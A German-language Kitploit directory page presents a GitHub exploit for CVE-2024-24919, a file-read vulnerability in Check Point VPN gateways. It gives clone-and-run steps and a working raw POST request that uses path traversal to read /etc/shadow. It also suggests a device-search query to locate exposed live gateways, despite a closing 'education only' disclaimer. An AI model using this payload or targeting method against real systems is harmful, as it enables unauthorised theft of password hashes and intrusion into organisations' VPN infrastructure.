Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-24919-Exploit — CVE-2024-24919 Exploit und PoC - Kritischer LFI für Remote Access VPN oder Mobile Access. | Kitploit
Tools/GitHubGitHub/rug4lo/cve-2024-24919-exploit
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsLernen & Bildung
GitHubrug4lo/cve-2024-24919-exploit

CVE-2024-24919-Exploit

CVE-2024-24919 Exploit und PoC - Kritischer LFI für Remote Access VPN oder Mobile Access.

Repository anzeigen
32vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-24919-Exploit

Überblick

Dieses Repository enthält einen Python-Exploit für CVE-2024-24919, eine Schwachstelle, die es ermöglicht, sensible Dateien von der verwundbaren Seite auszulesen.

Dieser Exploit prüft zunächst, ob das Ziel verwundbar ist, und ruft dann den von Ihnen angegebenen Pfad ab.

Schweregrad: Kritisch

Verwendung

Klonen Sie zunächst das Repository:

root@kitploit:~
git clone https://github.com/Rug4lo/CVE-2024-24919-Exploit
cd CVE-2024-24919-Exploit

Geben Sie Berechtigungen und führen Sie den Exploit mit Python3 aus:

root@kitploit:~
chmod +x exploit.py
python3 exploit.py

Folgen Sie dann den Schritten und Sie erhalten die Daten der von Ihnen angegebenen Datei.

Wenn Sie Probleme haben, stellen Sie sicher, dass die von Ihnen angegebene URL die Haupt-URL ist:

✓ https://google.com

✘ https://google.com/search?client=firefox

POC (Proof of Concept)

Zuerst müssen wir sicherstellen, dass die Website über Check Point Security Gateways verfügt, für die Remote Access VPN oder Mobile Access Software aktiviert ist.

In diesem Exploit zeigen wir auf den Endpunkt {ip}/clients/MyCRL.

Dieser Endpunkt ist anfällig, wenn wir eine POST-Anfrage senden, den String CSHELL/ und den Pfad der Datei hinzufügen, die wir mittels Path Traversal lesen möchten.

Die Anfrage sieht etwa so aus:

root@kitploit:~
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

All dies haben wir durch Analyse des Quellcodes ermittelt.

Weitere Informationen zum Vorgang finden Sie in diesem Beitrag: https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/

Test

Wenn Sie diese Schwachstelle testen möchten, können Sie Sodan verwenden, um anfällige Websites zu finden – mit dieser Abfrage in Sodan:

root@kitploit:~
Server: "Check Point SVN Foundation"

Referenzen

https://nvd.nist.gov/vuln/detail/CVE-2024-24919 https://www.cronup.com/cve-2024-24919-zeroday-critico-explotado-activamente-en-vpns-check-point/ https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-24919

Haftungsausschluss

Dieses Skript dient ausschließlich zu Bildungszwecken. Verwenden Sie es verantwortungsbewusst und nur auf Systemen, für die Sie eine Zugriffsberechtigung haben.

Tool herunterladen